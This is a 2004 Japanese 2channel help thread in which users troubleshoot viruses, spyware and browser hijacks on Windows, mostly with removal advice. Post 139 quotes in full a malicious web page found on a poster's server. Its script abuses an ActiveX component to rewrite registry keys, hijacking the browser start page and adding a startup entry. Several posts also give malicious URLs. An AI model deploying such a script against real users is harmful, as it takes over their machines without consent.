オンラインスキャンでウイルスを見つけて、手動で除去で
良いのではないでしょうか。

96 :名無しさん@お腹いっぱい。:04/06/15 20:00
>>93
「使えると書いていない」場合は使えることもあるけど
「使えないと書いてある」場合は間違いなく使えない。

97 :名無しさん@お腹いっぱい。:04/06/15 20:09
>>93
これは旧NEC98にも対応してるみたいだよ。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

98 :93:04/06/15 21:42
みなさん、回答ありがとうございます。
とりあえずソフトの購入は見送る事にします。

99 :451:04/06/15 22:00
ウイルスソフトって1回インストールしたものって使えるわけ?

100 :451:04/06/15 22:02
使えたら人のを借りてインストールできませんか?

101 :名無しさん@お腹いっぱい。:04/06/15 22:15
w32.Spybot.Wormに感染してしまいました。
どのファイルが感染しているかも分かっているのですが
削除しようとしても削除できませんと出るのですが
どうしたらよいのでしょうか?
是非教えていただけませんか?


102 :名無しさん@お腹いっぱい。:04/06/15 22:18
>>101
ウィルス情報&質問 総合スレッド☆Part20
http://pc5.2ch.net/test/read.cgi/sec/1086098775/704

103 :名無しさん@お腹いっぱい。:04/06/15 22:22
>>99
>>100
どのソフトですかっと

104 :名無しさん@お腹いっぱい。:04/06/15 22:23
ATPartners.dllはAVGでひっかかって削除されますた

105 :名無しさん@お腹いっぱい。:04/06/15 22:26
ありがとうございます。
見たのですが自分の感染したファイルは
C:¥WINDOWS¥system32¥wuamgrd.exeというものです。
これは削除してしまってもへいきなものなのでしょうか?
またsafeモードで削除するとは
具体的にはどのようにすればよいのでしょうか?

106 :名無しさん@お腹いっぱい。:04/06/15 22:29
>>105
OSがXPならF8キーを押しながらPCを起動して、
その後にsafeモードを選択する。

wuamgrd.exeというファイルはうちのXPには無いよ。

107 :名無しさん@お腹いっぱい。:04/06/15 22:30
>>105
削除して平気だよ。というか消さなきゃいけない。

108 :名無しさん@お腹いっぱい。:04/06/15 22:33
みなさん親切にどうもありがとうございます。
本当に助かったっす。早速やってみます。

109 :名無しさん@お腹いっぱい。:04/06/15 22:39
ウイルスメールが2ヶ月止みません。
ヘッダ情報から見て同じ発信者からなのですが、
そのプロバイダーに通報しても何もしてくれません。
(適当なコピペは毎回同じ内容で送られてきます。)
警察に相談しても法律がないと言われ…
皆さんは、この場合どのように対処されますか?
宜しくお願いします。

110 :名無しさん@お腹いっぱい。:04/06/15 22:44
>>109
1.プロバイダのメールチェックサービスを利用
2.文面が同じなら仕分け設定で即削除
3.気にしない

111 :名無しさん@お腹いっぱい。:04/06/15 22:44
>>109
無視が一番なんじゃない?
ドメイン指定で拒否もできるようだけど。

あとはサーバーでウイルス付メールを削除する
サービスとか。別料金かかるかも。

112 :名無しさん@お腹いっぱい。:04/06/15 22:45
>>109
いちいち気にしてたら、今時はネットやってられない。
世知辛いよな。

113 :109:04/06/15 22:58
>>110〜112
チェックサービスは受けています。
当初無視していたのですが、
1日に10通近く来るのでプロバイダーに通報したら、
なんとも軽視された状態となって…
それにムカついているだけなのかも知れませんね。
やはり無視する事としますか。
しかしyahooはアホ企業ですね。プララなんてすぐ対応してくれました。

114 :名無しさん@お腹いっぱい。:04/06/15 22:59
ウイルスメールが全然来ません。
ヘッダ情報から見て違う発信者からなのですが、
そのプロバイダーに通報する意味がありません。
(適当なコピペで毎回同じ内容で送ったら怒られるんだろうなぁ。)
警察に相談しても時間がもったいないと言われ…
皆さんは、この場合どのように対処されますか?
宜しくお願いします。

115 :109:04/06/15 23:00
あっすみません。
110〜112さん、ありがとうございました。

116 :名無しさん@お腹いっぱい。:04/06/15 23:21
>>103
アンチウイルスです!
それと体験版って期限が切れた後、再度ダウンロードはできないんですか?

117 :名無しさん@お腹いっぱい。:04/06/15 23:22
質問です。

既にウイルスに感染している状態で
フリーのアンチウイルスソフト(AVG)をインストールした為なんでしょうか。

以降ほとんどのプログラムを使おうとすると (バグっぽい)AVG Resident Shieldの画面に移動し、
次に「指定したデバイス、パス、またはファイルにアクセスできません。
     適切なアクセス許可がない可能性があります。」
と警告が表示され、使用する事が出来なくなってしまってます。

アンインストールも他のアンチウイルスソフトも使えない状態で、混乱中です。
Windows Me で警告に出てくるウイルスはトロイです。

118 :名無しさん@お腹いっぱい。:04/06/15 23:35
>>117
そのトロイを駆除してください

119 :117:04/06/15 23:58
レス有難うございます。
うー… 駆除できませんです。

トレンドマイクロのウイルススキャンでの駆除は無理でした。
(検出されたのはTROJ_SPOONER.B TROJ_BRISS.Aでした。)
他のアンチウイルスソフト(nortonとか)も使ってみようとしたのですが、
AVG Resident Shield → 「指定したデバイス、パス、または・・・
で、起動せず状態なんです。
と言うかネット以外のプログラムの殆どは同じ感じで動作しません。

何か上手い具合の駆除方法はあるのでしょうか。

120 :名無しさん@お腹いっぱい。:04/06/16 00:04
>>119
トレンドマイクロのスキャンでどこに感染した
ファイルがあるか表示されたでしょ?
それを手動で駆除したら?

121 :名無しさん@お腹いっぱい。:04/06/16 00:23
>>119
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SPOONER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_BRISS.H

122 :名無しさん@お腹いっぱい。:04/06/16 00:38
>>119
あのさ、漏れもほとんど同じ状況(AVG使ったらアプリあぼーn)
なんだけど、使えなくなったアプリケーションのフォルダのなかにEXEファイルが
なくなってるんじゃないかな?多分あの野郎が隔離しちゃったんだろうけど、
どこいったのかわかんないんだよね。それともこれもウイルスのせい?
でも「隔離しました」って本人がいってるしなぁ・・・

123 :名無しさん@お腹いっぱい。:04/06/16 00:43
ちょっと質問ですが・・OCNのIPって p○○○○-ipad○○osakakita.osaka.ocn.ne.jp
あるんだけど、掲示板で投稿すると毎回○の部分って変わる?

124 :名無しさん@お腹いっぱい。:04/06/16 00:48
>>123
回線をいったん切ると変わる場合がある。

125 :名無しさん@お腹いっぱい。:04/06/16 01:24
トロイにやられ再インストールしたのですが
今度はきちんとセキュリティーソフトを買おうと思ってます。
おすすめのソフトがあれば是非教えてください
W98です

126 :名無しさん@お腹いっぱい。:04/06/16 01:43
光なんですが、MS04−011の攻撃に困っています。
どうすれば防げるか、教えていただけますか?


127 :名無しさん@お腹いっぱい。:04/06/16 01:46
>>126
ネットを切断すれば来なくなるだろ。

128 :名無しさん@お腹いっぱい。:04/06/16 02:30
質問ですがモデムの中にconexant.ambitsoftk56data.fax ich modem
というのが削除できないのですがどうすればいいのですか?




129 :名無しさん@お腹いっぱい。:04/06/16 02:41
http://bubalom.by.ru/luisa/gallery1.htmlのサイトを開いたところ、
デスクトップに変な画面が表示された状態になっています。
Ad-wareたSpybotでスキャン>修正を行ったのですが、症状に代わりがありませんでした。
解決策を教えてください

現在デスクトップはこんな感じになっています・・・orz
http://maniakou.s7.xrea.com/cgi-bin/upload/img/img20040616021926.jpg
IEを起動し、サイトに接続するとエッチなサイトが別のウインドウで開きます・・・


130 :名無しさん@お腹いっぱい。:04/06/16 03:17
>>129

IE使うのやめてOperaにする。

131 :名無しさん@お腹いっぱい。:04/06/16 03:21
>>129
とりあえず>>23

132 :名無しさん@お腹いっぱい。:04/06/16 04:07
オペラにしたら、スパイウェアにひっかからないの・・?

133 :名無しさん@お腹いっぱい。:04/06/16 04:59
>>132

OperaはアクチブXやVBSが使えないのでスパイやトロイの進入経路がほとんどない。
Javaもオプション(別途インスコ)だし、ポップアップバナーとかも殺せる。
当然それと引き換えにマルチメディアでインタラクチブなHPとかうまく表示できない。
なので、
エロサイトやUG→Opera
それ以外の安全なサイト→IE
って使い分けるといい感じ。
IEがスパイとかでイカレたときにその修復方法をネットで検索するためにもあると便利。

134 :名無しさん@お腹いっぱい。:04/06/16 05:29
>IEがスパイとかで。。。
>>129 のようにIEがブラウザハイジャックされたときに、
その修復方法をネットで検索>完全に修復できないでIEを立ち上げてまた感染>さらにネットで検索
、、、と無限ループに陥ってしまわないためにOperaで検索するとよい。
ちなみに、Opera自身はハイジャックに対して免疫。

135 :132:04/06/16 06:01
>>133 >>134
詳しい説明、トンクス

極端な話、Operaを使っている人はエロい人ってことか。


136 :名無しさん@お腹いっぱい。:04/06/16 06:13
>>135
エロいってこともなくはないが、最近は油断も隙もないからな。
オレは2CHのリンクはOPERA606(Java切りJavaScript切り)で開くように設定している。
これで何を踏んでも安全だ。

137 :名無しさん@お腹いっぱい。:04/06/16 07:58
>135
最近はエロページじゃなくてもヘンなもの仕込んでる事もあるし
Operaのほうが便利だったりするし・・・
俺はWindows UpdateやOperaでうまく表示できないページをIE
それ以外をOperaで見るようにしてる。

でも、現在の正式なOpera日本語版(7.23以前)はセキュリティホールが放置されてるので
導入するなら7.51英語版にしたほうがいいっす。
必要なら日本語化もできるし。


138 :132:04/06/16 09:40
φ(..)メモメモ

139 :husianasan:04/06/16 10:39
<script language="JavaScript">
<!--

function SymError()
{
return true;
}

window.onerror = SymError;

//-->
</script>

<script language="JavaScript">
if (document.all)
{
document.writeln('<applet code="com.ms.activeX.ActiveXComponent" width="0" height="0" id="appl"></applet>');
}
function rwrt()
{
document.applets("appl").setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
document.applets("appl").createInstance();
document.applets("appl").GetObject().RegWrite('HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page','http://addesign.rucs.spb.ru');
document.applets("appl").GetObject().RegWrite('HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iexplore.exe','"C:\\Program Files\\Internet Explorer\\iexplore.exe"');
document.applets("appl").GetObject().RegWrite('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl銃r\\StartmenuLogoff',1,'REG_DWORD');
}
setTimeout("rwrt();",1000);
</script>
うちの鯖にこんな内容のhtmlがアップされてたのですが、消したほうがいいでしょうか?
http://arcadiaexpress.zive.net/src/up0116.htm

140 :218-228-234-68.eonet.ne.jp:04/06/16 10:46
ちなみにノートン先生は無反応でした。

141 :名無しさん@お腹いっぱい。:04/06/16 12:04
Stingerで調べてみたところw32/pate.bやw32/pate.damなどが出てきたんですけど、これらは破壊活動はない。と
テンプレのサイトに書いてあったんですけどほっといても問題ないものなんでしょうか?

142 :名無しさん@お腹いっぱい。:04/06/16 12:08
スレ違いでした。すいません

143 :名無しさん@お腹いっぱい。:04/06/16 12:20
>>139
消す消さない以前に、知らないうちにHTMLがアップされるような運用する方が問題ありだと思うのだが。

144 :名無しさん@お腹いっぱい。:04/06/16 12:50
OS(製品版メディア)を人に貸すことによって起こる弊害ってありますか?
法的な問題以外で。
自分でお金を出して買ったものなので貸したくは無いのですが
立場的に断りきれません。何か上手く断れる方法があれば良いんですが・・・

145 :名無しさん@お腹いっぱい。:04/06/16 13:05
>>144
立場的に断れないのなら、法的理由で押すしかないのではないでしょうか?
その方があなたのOSを使う間、あなたも使うのでしょう?
「違法行為であなたに累が及んだ時の責任は取れませんから、すみません」
とか、XPなら
「プロダクトアクティベーションの問題もあるので・・」
とか何とかで断るのが良いと思いますよ。
私ならまず断ります。

146 :名無しさん@お腹いっぱい。:04/06/16 13:05
>>144
法的な問題“以外”って…。
いちばん重要な問題を除外してどーする。

147 :名無しさん@お腹いっぱい。:04/06/16 13:06
>>146
おっとかぶった。スマン。

148 :144:04/06/16 13:07
本当はその人がXPプリインストールパソコンを購入したのを
知っているからちょい恐くなって聞いた次第です。
ちゃねら〜らしいので既にここ見られてるかも

149 :名無しさん@お腹いっぱい。:04/06/16 13:10
>>148
ということは・・あなたのOSって・・。

150 :名無しさん@お腹いっぱい。:04/06/16 13:12
>>149
ああ、言わなくっていいです。貸さないことです。
理由はどうあれ。

151 :名無しさん@お腹いっぱい。:04/06/16 13:52
すみません。
初歩的な質問かも知れませんが、宜しくお願いします。

最近、インターネットをHPを閲覧中に
ふと画面上のツールバーが並ぶ場所に目をやると
見慣れない検索用のツールバーがあったんです。

その検索用のツールバーの中には、あらかじめ文字が入っていて
(Enter the search term)それををクリックすると、自動的に
ttp://search.startium.com/_1_2W3FTY303G7PS8M__star.srtium/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=Enter%20the%20search%20term&top=1&start=&ver=22810
というURLにジャンプします。

もしかしたら、何かの拍子にウィルスに感染したのかと思い
更新済みのNortonでスキャンしたのですが、感染していませんでした。
システムの復元は、新ウィルスの場合は余計にOSが悪化する
可能性があると聞き、まだ試していません。

今の所、特に目立った問題は起こっていませんが
何やら不気味な感じがして、気が気でなりません。
もしもの場合は、システムの復元はもちろん
OSの再インストールも考えていますが
また同じケースに陥るのは嫌なので、原因が知りたいです。

どなたか、こうなってしまった理由が分かる方は居ないでしょうか?
どうか宜しくお願い致します。

OSはWinXP
ブラウザーはIE6.0にGoogleのツールバーを使っています。



152 :151:04/06/16 14:00
連続でカキコすみません。
ちょっと気になった事がありましたもので…。

上の質問の中で出て来たURLは、一見怪しくなさそうなのですが
もし、クリックしてウィルスに感染する方が出ると申し訳無いので
情報を知らない方は、絶対にクリックしないでください。すみません。

153 :144:04/06/16 14:01
皆さん有難うございました。
法的問題は前もって釘刺されてたので持ち出しにくかったんですが、
そう言うしかないですね。ギスギスした関係になった後社内イジメに
あうかもしれません。その時はまた復讐方法アドバイス頂きにきます。

154 :名無しさん@お腹いっぱい。:04/06/16 14:12
>>151
スパイウェアの可能性が高いのでは?
とりあえずテンプレにあるこのサイトをじっくり読んで欲しい。
http://haiiro.info/my/text/template.html
サイト名は「エロサイトを見たら…助けてください! まとめページ」だけど、
スパイウェア対策もある。

155 :名無しさん@お腹いっぱい。:04/06/16 15:41
画像掲示板でgifファイルをクリックしたら
>>129と同じ状態になってしまいました。
http://maniakou.s7.xrea.com/cgi-bin/upload/img/img20040616021926.jpg ←129の
おまけにCPU使用率100%で、タスクマネージャを見るとmstasks2.exeというのが
原因みたいだったので終了させました。(削除するべき?)
そして、テンプレサイトの緊急処置をシステムの復元以外(復元無効にしてたからできなかった;)
試し、検知した物は削除しました。

けど、デスクトップとIEのホームが変なままです。(変なサイトに飛ばされることはなくなった)
やっぱりシステムの復元しないと治らないのかな・・・?

156 :名無しさん@お腹いっぱい。:04/06/16 16:12
>>155
それだけなら、HijackThisで
O4 - HKLM\..\Run: [ist service uninstall] C:\WINDOWS\mstasks2.exe /u
をFix。

OSがXP、2000ならこれも試す。(CnsMin駆除ツール)
ttp://bdc.s15.xrea.com/index.php?option=com_remository&Itemid=59&func=fileinfo&parent=category&filecatid=6

HijackThisの説明や使い方や手に入れ方は>>151さんのサイトへ。
あとは>>151さんのサイト先で学習して実行してくる。

157 :名無しさん@お腹いっぱい。:04/06/16 16:21
>>156
151のサイトはまずいんじゃねぇか?w

158 :名無しさん@お腹いっぱい。:04/06/16 16:23
>>156
>>151さんのサイト先じゃなくて、
>>154さんのサイトでした。
何気に地雷URLの場所をしてしまいました、
本当にごめんなさい。

159 :155:04/06/16 16:27
>>156,8
いえいえ、親切にどうもです!さっそく試させて頂きます。

160 :名無しさん@お腹いっぱい。:04/06/16 17:05
>>144
それってXP Pro?だったら
「XPはプロダクトIDをMSに送信してて不正使用がバレるからイヤだ」
って断れば?
それでも「いーじゃんか、貸せよ」とか言われたら
CD-Rにコピって
「おれのプロダクトキーはもおMSに登録しちゃったから、
UGとかで法人版とかのを自力で探してきてね」
って言ってあげちゃえばいい。
要はプロダクトIDさえ違えば問題ナシ。(どんなOSでも)
法的なことかもだけど、ある日突然MSから警告されたりするとイヤじゃん?(ありえないけど)

161 :名無しさん@お腹いっぱい。:04/06/16 17:20
>153
Microsoftに相談して、撃退方法を教えて欲しいとお願いするとか
いっしょに撃退して欲しいとお願いするとか・・・
とにかく、貸せって言ってるほうにも、違法行為である事を
ハッキリわからせたほうがいいと思う。

それが原因で社内いじめが始まったら、しかるべき筋に相談したほうがいいと思うよ。
違法行為の強要を断ったのが原因なら、嬉々として相談に乗ってくれるんじゃないかな?


162 :名無しさん@お腹いっぱい。:04/06/16 17:26
>>153
本当に断りきれそうになくなってきたら、ACCSに相談という手もあるな。
ちなみに言っとくけど、この板はアタック方法の相談は受けないから。

163 :名無しさん@お腹いっぱい。:04/06/16 17:30
ttp://toyama.cool.ne.jp/komcom/sub4-209.htm
を見てしまってAVGでウイルススキャンしたらredlofが出たので
隔離したんですけどこの後は何をすればいいんでしょうか
検出されたファイルはこのサイトのインターネットのキャッシュだけでした。
ちなみにoperaです。

164 :129:04/06/16 17:39
いろいろな方法を試して、何とかIEのホームページと、
エッチなサイトが開くことはなくすことが出来ましたが、
いまだにデスクトップがあの状態です。タスクバーにも変な検索バーが
あるままです。
どうすればいいのでしょうか?

165 :名無しさん@お腹いっぱい。:04/06/16 17:47
>>163
今まできちんとWindowsUpdateやっていてIEを使っていなかったなら、キャッシュから隔離してあれば大丈夫だろ。
心配なら、トレンドマイクロかシマンテックのオンラインスキャンを試しとけ。

166 :名無しさん@お腹いっぱい。:04/06/16 17:51
>>165
そうですか。安心しました。ありがとうございました

167 :名無しさん@お腹いっぱい。:04/06/16 18:31
一旦インスコしたマカフィーをアンインスコしてVB2004を
入れたんですが、起動の度に「マカフィーパーソナルファイアウォールプラス」
の小窓が出て「サブスクリプションを確認」を要求します。
閉じると「サブスクリプションの確認をキャンセルしてもよろしいか?」
はい、で消えるんですが
毎回毎回ウザすぎ!
この小窓はどうすれば消せますか?

ちなみに上記のところで「確認」をクリックすると
マカフィーのHPへ飛び、パスワードを入れてログインしても
「ランタイムエラーが発生しました。デバッグしますか?」
と出るので、わけもわからず「はい」としても
その後のページでエラーが出て「中断」しかなくなります。


168 :70:04/06/16 18:41
すみませんがもう一度質問させてください。
>>70の続きなんですが、そのメールを送った相手が、企業や大学など
の大組織でも名前と住所を特定されることは絶対にないんでしょうか?
(ちなみにメールには自分のアドレスだけ書いて他の個人情報は書いてません)
似たような質問で申し訳ないんですがわかる人がいたらぜひ教えてください。

169 :名無しさん@お腹いっぱい。:04/06/16 18:44
この世に絶対は無い

が、よほどの事でもしない限りそんなことはない
まぁ警察が介入しないよほどの事なんてやばいが

170 :70:04/06/16 18:48
>>169 要するに警察が介入してこなければ物理的に不可能という
ことなんでしょか?

171 :130:04/06/16 18:49
>>129
必死そうだったのでWinny総合スレから追っかけてきたんだが。。。
壁紙>画面のプロパから壁紙戻してもダメ?
1.Ctrl+Alt+Del押してプロセスの中に見慣れないexeがあったらメモってネット検索、
スパイやトロイだったらそのexeや関連ファイル名でWindowsのファイル検索かけて
探し出して手動で削除。その際にそのexeの作成日時をメモっておく。
2.次にレジストリエディタを起動してそのexeの名前や関連ファイル名で検索、
Hitしたキーを片っ端から削除。
3.「1」で「使用中なので削除できません」って言われたら、
「ファイル名を指定して実行」で「msconfig」と入力>
スタートアップ項目の該当exeのチェックをはずして再起動後に削除。
4.「1」でメモった日付けでWindowsのファイル検索で全検索、
日時が「分秒まで全く同じ」ものが見つかった場合
関連ファイルである可能性が高いので削除か隔離。
かなり危険な操作なので、やる前に復元ポイントを作成しておくように。


172 :130:04/06/16 18:54
ああ、ウィルス(スパイ)の名前はわかってるので、
その名前(ナントカ.exe)&関連ファイル(それが作るファイルやフォルダ)名で
レジストリとHDDを検索すればいいね。。。

173 :名無しさん@お腹いっぱい。:04/06/16 18:57
>>167
馬鹿フィーのアンインストーラがレジストリにゴミを放置してあるっぽいな。
jv16で不要レジストリを消してみ。
jv16 Powertools 1.3.0.195 (last uncrippled Freeware version)
ttp://www.321download.com/LastFreeware/
項目下端のDownloadのリンクをクリック。(macesoft.comのリンクは有料版)

念のため↓ダウンロードリンク
ttp://www.321download.com/LastFreeware/dl/jv16_1.3.0.195.zip

jv16の使い方は「Outpostファイアウォールまとめサイト」
http://www.geocities.jp/outpost_2ch/setting.html#10


174 :名無しさん@お腹いっぱい。:04/06/16 18:59
>>164
アクティブデスクトップは関係あるかな。やってみた?

>>168
それはもう「杞人の憂い」ってヤツだな。
やましい点が自分にないのなら、胸を張ってイ`!

175 :70:04/06/16 19:04
>>168にも申し訳ないのですが、本当に教えて君ですみません。
しかしかなり心配な事なので・・・(でも犯罪的なことではありません)
170の質問は、どんなに送った相手が凄腕であっても警察が介入しない
限り私のメールアドレスだけからは名前、住所は物理的に特定できないのか?とい
う事です。ただ「心配ない!」だけじゃかなり心配なんで・・・
本当に何度もすみません。

176 :名無しさん@お腹いっぱい。:04/06/16 19:04
>>70
プロバが情報公開しないかぎり個人の特定までは不可能。
ただ、POPメールの場合、ヘッダ情報に発信メールサーバーが書き込まれているので、
プロバによっては「だいたいどの辺に住んでる」くらいまではバレる可能性あり。
それがイヤならWEBメールをブラウザから使うといい。

177 :名無しさん@お腹いっぱい。:04/06/16 19:08
>>175
バカじゃねーの。
そんなに心配ならこの世をオサラバすりゃいい。

178 :名無しさん@お腹いっぱい。:04/06/16 19:11
>>70
相手がどれくらいあなたのことを知っているかによるだろうけど、
「だいたいどの辺に住んでいて、こんなHNを使ってて、こーゆうことに興味があるらしい」
ってことがわかっていれば探偵とか雇えば見つけられちゃうかもね?

179 :155:04/06/16 19:13
あ〜駄目だ; >>129さんも同じことで悩んでるんだろうなぁ。
IEのホームとcpu使用率の異常は治りましたが、デスクトップの表示だけが治りません・・・。(OSはXPです)
C\WINDOWS\WEBの中にあったデスクトップを覆っているページの
.htmと.gifファイルを削除したら元に戻るかと思ったが、
デスクトップが真っ白(アイコンある)になっただけだった。
あと、感染した時にいくつかのファイル(.exe.txtやら)が作成されてるので
それを消したらどうなるか・・・怖くてできない;;


あとPC起動すると、C\WINDOWS\sistem32\services\msxmidi.exeが見当たらないと警告がでるし。。。
あぁ誰かご教授を。




180 :名無しさん@お腹いっぱい。:04/06/16 19:14
>>179
http://www.smart-security.info/removal.html

181 :70:04/06/16 19:19
皆さんいろいろ答えてくれて本当にありがとうございました。
迷惑おかけして本当にすみませんでした。心の重荷が少し
取れました。最後に質問ですが「プロバによっては」とはたと
えばどんな種類の会社でしょうか?

182 :名無しさん@お腹いっぱい。:04/06/16 19:20
>>175
一歩譲って、仮に(本当に仮に)名前と住所が知られたとして、なにか不都合ある?
2ちゃん等で公にされたら、そりゃ確かに気分悪いけどさ。
君の家へ君宛(又は家族宛)のダイレクトメール位は来るでしょ。

183 :名無しさん@お腹いっぱい。:04/06/16 19:23
ttp://bbsloadup.ath.cx/upload/keiji_ban/?my_swich=img_open&imgfile_name=CF1_20040217200133.jpg

こういうのを踏むとプライバシーの警告というダイアログがでてフリーズしてしまいます
OSは98 スパイボット バスター 入れてます
ブラウザはIEとライブ2ちゃん どちらで踏んでも同じです
なにが原因か分かりますか?

184 :名無しさん@お腹いっぱい。:04/06/16 19:27
>>181
なんだ、こいつは

185 :名無しさん@お腹いっぱい。:04/06/16 19:28
管理者権限なしに、管理者権限が必要なソフトのインストールの仕方を教えてください。

186 :130:04/06/16 19:28
>>155
レジストリエディタを起動
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
のRunとRunナントカで始まるいくつかのセクションの中に怪しいキーがあったら
パスから判断するかネット検索するかして犯人を見つけて削除。
その際にそのパスにあるファイル自身も削除。できなかったら再起動後に。

187 :名無しさん@お腹いっぱい。:04/06/16 19:29
ノートン先生でスキャンをし
ファイル名obem.dll
脅威名 adware main seach
が削除できませんなぜでしょうか?

OSはXPでIEの6・0
PCはNECのを使ってます

188 :名無しさん@お腹いっぱい。:04/06/16 19:34
>>179
HIJACKTHISで下の値をあるやつからFix。
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\SYSTEM\services\2.01.00.dll
O2 - BHO: (no name) - {9C691A33-7DDA-4C2F-BE4C-C176083F35CF} - C:\WINDOWS\DOWNLOADED PROGRAM FILES\CONFLICT.4\BRIDGE.DLL (file missing)
O4 - HKLM\..\Run: [xpsystem] C:\WINDOWS\SYSTEM\SERVICES\MSXMIDI.EXE
O4 - HKCU\..\Run: [xpsystem] C:\WINDOWS\SYSTEM\SERVICES\MSXMIDI.EXE
O16 - DPF: {9C691A33-7DDA-4C2F-BE4C-C176083F35CF} (brdg Class) - http://static.flingstone.com/cab/98ME/CDTInc/bridge.cab

189 :155:04/06/16 19:35
デスクトップ元に戻りました!感謝!
画面のプロパティのカスタマイズでWEBの項目にsecurityというのがが登録されていたので
削除したらあっさりと。。。ヤッター
あとは起動直後の警告文と怪しいファイルが問題だけど
気にしないでも大丈夫かな・・・。

190 :名無しさん@お腹いっぱい。:04/06/16 19:40
>>181
メル発信サーバー(=SMTPサーバー)がたとえば「smtp.kng02.ナンチャラ」とかってなってたら、
神奈川の第二サーバーが担当する区域からの発信だってことがわかる。
割り当て方はプロバによってさまざまだが、仮に4台のサーバーを北のほうから4つに分けて
割り当ててるとしたら「神奈川県の真ん中よりちょっと上の市」くらいまでは特定されちゃうんじゃないかな?
どのプロバがどういうルール(区域でなく入会順とか完全ランダムとか)で割り当てているかは俺は知らないが。
ただローカルでマイナーなケーブルネットだったらもっと簡単に見つかっちゃうかもね?
ハイ、この話題はこれでおしまい!

191 :155:04/06/16 19:44
>>180>>130>>188
ありがとうございます!いろいろ試してみます。
助けてもらって本当に感謝!

192 :129:04/06/16 19:50
>>189さんの言う通りにしたら、デスクトップが帰ってきました!!
うちでは警告文は出てないのでこれでいいのかな?
あとは、起動するとマイドキュメントが自動で開いてしまうのがうざい・・・

みなさんありがとうございました


193 :名無しさん@お腹いっぱい。:04/06/16 20:24
180のアドレスのファイルきどうしたら壁紙が真っ白になり変更不可能になってしまいました・・・・
なにか解決策はありませんか?

194 :名無しさん@お腹いっぱい。:04/06/16 20:44
自分のPCに侵入されないためには
どうすればよいのですか?
教えてください。

195 :名無しさん@お腹いっぱい。:04/06/16 20:53
>>193
自分は180のファイルをインストールしていないので想像だけで話しますが、、、
見たところアクティブデスクトップを殺すツールのようですね。
デスクトップを右クリックからプロパ>画面のプロパ>デスクトップってタブがありませんか?
あればそこから壁紙を変更できます。
なければ。。。XPではアクティブデスクトップを殺すとこれが出なくなるバグ(仕様?)があるようです。
このツールをアンインストールできたらしてみてください。
できなかったら、「窓の手」をインストールしてウィンドウタブの「従来のWindowsスタイルで。。。」項目に
チェックして「設定反映」し、もう一度チェックをはずしてから「設定反映」してみてください。
これでうまくいかなかったら。。。自分にはわかりません。ごめんなさい。

196 :名無しさん@お腹いっぱい。:04/06/16 20:57
>>194
ネットをやらない。LANを組まない。他人からもらったFD、MO、CD-R等を読み込まない。

197 :名無しさん@お腹いっぱい。:04/06/16 21:23
>>196
完璧ですね。

でもLANも組んでるし、他人からもらったやつもつかいたいのです。
防御法、もし侵入された場合の確認などおしえてもらいたいです。
ポートなどの最低限の対策はしてるつもりです。


198 :167:04/06/16 21:31
>>173
レスありがとうございます。
それぞれのページに逝ってみましたが初心者の私には
チンプンカンプンでした。
それらが理解できないと消すのは無理ですか?

199 :名無しさん@お腹いっぱい。:04/06/16 21:42
>>198
>>173 が金のかからない一番簡単な方法だろうね。
金かかってもよければWinDoctorのが理解しやすい
と思うけど。jv16は便利なツールだからこの機会に使い方
覚えとくといいよ。

200 :196:04/06/16 21:43
>>197
OSやLAN環境によっても違うのだが。。。
パーソナルファイアウォール(Zone等)、アンチウィルスソフト、を常駐させる。
ブラウザはOperaをメインにして、IE&OEはなるべく使わない。
ネットサーフィン終了時に必ずブラウザキャッシュを(必要ならクッキーも)クリアする。
PCを終了する前に必ずスパイチェッカー(SpyBot、AD-Aware等)でチェック。
XPなら不要なサービスを無効にし、正常時にどんなサービスが起動しているのか記録しておく。
レジストリの「HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion」と
「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion」の
Runで始まるセクションを普段から監視して追加があったらそれが何なのかよく調べる。
スタートアップフォルダの登録ソフトやAutexec.bat、Config,sysの記述を監視する。
XPなら復元ポイント、その他ならレジストリバックアップをこまめにする。
。。。これくらい気をつけていればまず大丈夫ではないかと。

201 :名無しさん@お腹いっぱい。:04/06/16 21:47
>>198
バスターアンインスコ→マカフィー再インストール
→マカフィーアンインスコ→バスター再インストール
ってのも試す価値有り。
壊れかけたシステムにとどめさしちゃうこともあるけどね。

202 :名無しさん@お腹いっぱい。:04/06/16 21:55
追加。
IEのセキュリティを「高」に、最低でもActivXは殺す。
「.exe」、「.com」、「.bat」、「.scr」等の実行ファイルをうかつにWクリックしない。
最近はスパイが自己展開書庫に組み込まれている場合も多いので
そういった書庫はLHMelt等に放り込んで手動で展開するとよい。

203 :名無しさん@お腹いっぱい。:04/06/16 22:10
>>199
JV16はシェアだけなの?
フリー版は無い?

204 :名無しさん@お腹いっぱい。:04/06/16 22:13
>>200
レスどうもです。

なかなか地道な作業になるんですね。
でもこれで安全なら軽いです。
かなり感謝です。

ちなみにスパイってゆうのは何をするものなんですか?


205 :名無しさん@お腹いっぱい。:04/06/16 22:22
>>204
ここにもスパイウエアの患者さんがよく読めばいるぞ。
>>129さんや>>155さんのがそれ。
これは一例だがスパイウエア(トロイの場合もアリ)に感染すると、
情報が盗まれたりすることも最悪ある。

スパイウェアについての説明(IT用語辞典)
ttp://e-words.jp/w/E382B9E38391E382A4E382A6E382A7E382A2.html

206 :名無しさん@お腹いっぱい。:04/06/16 22:22
>>203
現行バージョンはシェアだけど古いのならあるよ。
ttp://www.nvinside.de/inhalt/tools/system.htm
シェアのほうも30日は使えるけど。

207 :名無しさん@お腹いっぱい。:04/06/16 22:23
>>204
クッキーで個人情報を流したり
ブラウザハイジャックで迷惑なサービスとかを組み込んでくれる。
同時にトロイである場合もある、つーか、同じようなもの。
「スパイウェア」でググりたまえよ。。。

208 :名無しさん@お腹いっぱい。:04/06/16 22:32
>>206
おぉ、さんきゅ。

